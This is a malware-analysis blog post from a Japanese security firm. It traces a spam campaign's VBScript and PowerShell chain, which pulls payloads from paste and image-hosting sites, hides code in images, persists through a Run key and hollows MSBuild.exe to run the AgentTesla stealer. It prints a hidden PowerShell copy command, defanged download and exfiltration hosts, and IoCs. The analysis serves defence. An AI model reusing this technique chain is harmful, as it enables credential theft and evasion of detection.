This post is also available in: 日本語
Introduction
ITOCHU Cyber & Intelligence Inc. (abbr. : ICI) routinely observes a large volume of spam emails to identify new attack tactics and the early stages of mass-attack campaigns targeting Japan. We are paying particular attention to emails with attachments in unusual file formats or mail body written in Japanese, as these could indicate targeted attacks.
This blog post delves into the analysis of a recent Japanese-language spam email with a multi-stage infection process.
This sample employed a combination of various traditional attack tactics, including obfuscated VBScripts and PowerShell scripts, malicious codes embedded in images (steganography), and the exploitation of free image-uploading and text-sharing websites used as payload retrieval infrastructure.
What is Steganography?
The art of concealing data within another medium.
Infection flow
The purpose of this sample was to deliver the AgentTesla malware to victims and infect them.
What is AgentTesla?
AgentTesla is an information stealer written in .NET Framework that has been observed since 2014.
It can steal a variety of information from victims, including keystrokes, clipboard contents, screenshots, and authentication credentials for installed software. The stolen data may be exfiltrated to other attackers. https://attack.mitre.org/software/S0331/
The infection flow is as follows:
As you can see, the several steps are involved in the process, from the receipt of the email to the final malware infection. Let's break down this process.
Malicious email
We have observed the following malicious email.
This email contained “payment-related” information, which is common subjects in email-based attacks. The sender's email address was a compromised email account belonging to a medical service company in Vietnam. Although the sender was Bank of Japan, yet a file named "韓国銀行の領収書 (In English, Receipt from Bank of Korea)” was attached. This inconsistency raised suspicions.
The domain mentioned in the closing paragraph did not match the official Bank of Japan domain. Additionally, the service center contact information was also presumed to be from a Thai bank, further contradicting the claim of being a financial institution’s email.
The attached file, 韓国銀行の領収書.tar.lz (md5: b73f8d56d31da6673025be38a4beb336), contained a VBScript file named 韓国銀行の領収書.vbs (md5: 6665a0f0f0b1d55cb8a85f115a8a1d07). Executing this VBScript file would ultimately lead to malware infection.
The .vbs extension is not visible by default in Windows settings, so it appears to users as a file named 韓国銀行の領収書 .
Analysis results
Let’s analyze the VBScript file.
The script written in the VBScript file first retrieves string data from a free text-sharing website called paste[.]ee. This technique of obtaining data from free text-sharing websites that leads to subsequent attacks, has been observed before.
References
Furthermore, Error messages are written in Portuguese. Is the developer of this VBScript fluent in Portuguese?
The string data retrieved from paste[.]ee is concatenated and replaced into some strings by the VBScript, which becomes a PowerShell script, and then executed.
This PowerShell script, as shown in the top part of Figure 5, replaces the string DgTre with the character A in the obfuscated string stored in the variable codigo (highlighted in green) and then decodes the string using base64 to execute the PowerShell script shown in the bottom part of Figure 5.
It is believed that the purpose of replacing specific strings and converting data into different formats is to evade detection by security products.
This PowerShell script fetches the image file new_image_vbs.jpg from a free image-uploading website "uploaddeimagens[.]com[.]br" and extracts and utilizes malicious code embedded within the image data. An example of the image file is shown in Figure 6 (The actual image has been masked to protect copyright).
The PowerShell script contained two URLs, and while the images at both URLs had the same design, malicious code was only embedded in one of them.
This method, where data is obtained from free image-uploading websites and malicious code is extracted from image data, has been widely exploited by many malware in the past.
References
We suspect that the attackers may use these detection-evasion techniques to fetch payloads:
- Retrieving data from image-uploading websites: Restricting access to these websites is challenging since they are not inherently malicious.
- Fetching data via HTTPS: Identifying the accessed path is difficult in environments that don't decrypt SSL traffic and maintain logs.
The PowerShell script retrieves the image new_image_vbs.jpg from two URLs stored within the script. It then combines these images and extracts the string enclosed by the tags <<BASE64_START>> and <<BASE64_END>> embedded in the data. This extracted string is decoded using Base64 and loaded as a .NET file. This .NET file is also a loader-type malware, hereafter call as the ".NET Loader".
Following this, the process moves to the VAI method of the Home class within PROJETOAUTOMACAO.VB provided by the .NET Loader. Several arguments are passed, including the inverted URLs txt.ude/ba/moc[.]o<redacted>m//:spxxh. These arguments will be discussed later.
Note: <redacted> is a placeholder for the domain of the compromised website.
The VAI method first uses the Class6 class's start method within the Project. This method checks for the existence of a file named Name_File.vbs in the C:\ProgramData\ directory. If the file is not found, it executes the following command to copy the VBScript file named 韓国銀行の領収書.vbs which located in the current directory to C:\ProgramData.
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
To ensure persistence, the VAI method also registers C:\ProgramData\Name_File.vbs for the current user's registry Run key (SOFTWARE\\Microsof\t\Windows\\CurrentVersion\\Run).
The VAI method then resumes control and sets the _applicationName variable to C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBUILD.exe, as shown in Figure 9. This is a preparation for a code injection technique known as Process Hollowing, which will be discussed later.
Next, as shown in Figure 10, the reversed URL string is restored to its original state, and the final malware payload is retrieved.
In this sample, the string txt.ude/ba/moc[.]o<redacted>m//:spxxh was restored to the URL hxxps://m<redacted>o[.]com/ab/edu[.]txt and data was retrieved from this URL.
The nature of the retrieved data suggested that it was encoded in Base64 and then reversed. Reversing and decoding it using CyberChef revealed that it was a PE file.
Finally, as shown in Figure 12, the malware launches the process specified in _applicationName, which is C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBUILD.exe, and injects the decoded PE file into the memory of that process. This is a process injection technique called Process Hollowing, which is implemented to evade detection by security products.
References
Further analysis of the PE file extracted using CyberChef revealed that it is AgentTesla, a .NET-based malware.
AgentTesla is capable of exfiltrating stolen information via email. The email exfiltration destination was identified as mail[.]privateemail[.]com (port: 587, protocol: smtp).
Figure 13 illustrates the malware configuration of AgentTesla.
Discussion
We've observed attacks utilizing similar infection techniques to target multiple malware types, including Remcos and XLoader (formerly Formbook). Analysis of related samples reveals that the attackers actively change file formats, using XLA and RTF, indicating an adaptive approach.
The day before the Japanese version of this post was published (April 15, 2024), PT Security released a blog post on the SteganoAmor campaign. The samples described in this post were similar to those we were analyzing at the time.
Reference:
SteganoAmor campaign: TA558 mass-attacking companies and public institutions all around the world
We consider this tactic to be one that warrants continued attention, as it is likely to see further implementation in the future to evade detection and anti-analysis. This could include more complex infection flows using multi-stage access, obfuscation of scripts, and the adoption of new techniques.
Countermeasures
We have implemented the following countermeasures to defend those malicious emails containing malware:
- Utilize spam filters to quarantine emails with attached VBS files or other malicious files with unusual extensions.
- We deploy specialized tools to detect them within compressed files such as ZIP archives.
IoCs
| file name | type | MD5 | SHA1 | SHA256 |
|---|---|---|---|---|
| 韓国銀行の領収書.tar.lz | Attachment | b73f8d56d31da6673025be38a4beb336 | c13241205c24133f1d042283777c94fc9f083959 | a5cd72de5d9b49324a4c3acce4dfd99b9cd07c5561b3df3178d5773980a327ad |
| 韓国銀行の領収書.vbs(韓国銀行の領収書.tar.lz の解凍後ファイル) | Downloader | 6665a0f0f0b1d55cb8a85f115a8a1d07 | 0db07da604d0ad9b033df395b3843a815ae415c9 | b9bbdc47e828eac24efc1576ef757a4a9fe72627f591b6ba74c6a57d6b47cc17 |
| 1gYLt | Malicious code | f94961734344d5b8f90871c428d180ea | b8ab78334f58e1cdf9374ffa8b4697f1cf2313ec | 10f0724e4a33ecb99465285d8b77602c68d07533cfaee7a7cea9f5f5ac273398 |
| new_image_vbs.jpg(979/original) | Image file | 63d7161e549f4ae373e2ec328cc10bcc | e074e84f245766b5693bb85a3be48ce65196a79b | 8b337abd81fe0fa0cfb773bc185da8ebcca425adb14f81c61e7c060e7d81aea1 |
| new_image_vbs.jpg(978/full/) | Image file | f48bc3d4ae14d039e9577aefbd64a680 | 1c47b7302dcaf3950dbf34d2bf9b91ca56078ba2 | 125514526ff630048097768f8d247112b0ff80b16126b32a3440dc5416998a64 |
| N/A | Downloader (embedded in an image) | 8bae771d41d8713a3583d24005c9039b | 6895ea61ce4600e6129353b0c5ae58f16bf26a78 | bbd3b070c7a7185603cdbfb576e7bcc9c01cd5c8263666b3a3ee5de5e3a427ab |
| edu.txt | Encoded AgentTesla | 3d95db8e258c5c636f6c0e167b2a47fe | bb65218a2eec9689b6db9a6c2aa8a6dfc531b6d3 | 0efdd91c6d1ffeca6e8eda3ece36cd849272dce1a2d9ab3c208be65a370d4493 |
| N/A | AgentTesla | 59a8039570f0634f82e7d25bddd37658 | 868fc0385ba057cef96178eb54f04677fc4a3aed | eda52b32b68b4a7f91bf7ddc52967d6541aa2d7d0ffbfd7a2cf1f70727bae239 |
| Destinations |
|---|
| hxxps://paste[.]ee/d/1gYLt |
| hxxps://uploaddeimagens[.]com[.]br/images/004/766/979/original/new_image_vbs[.]jpg?1712588500 |
| hxxps://uploaddeimagens[.]com[.]br/images/004/766/978/full/new_image_vbs[.]jpg?1712588469 |
| hxxps:// m<redacted>o[.]com /ab/edu[.]txt |
| mail[.]privateemail[.]com (Port:587, protocol:smtp) |
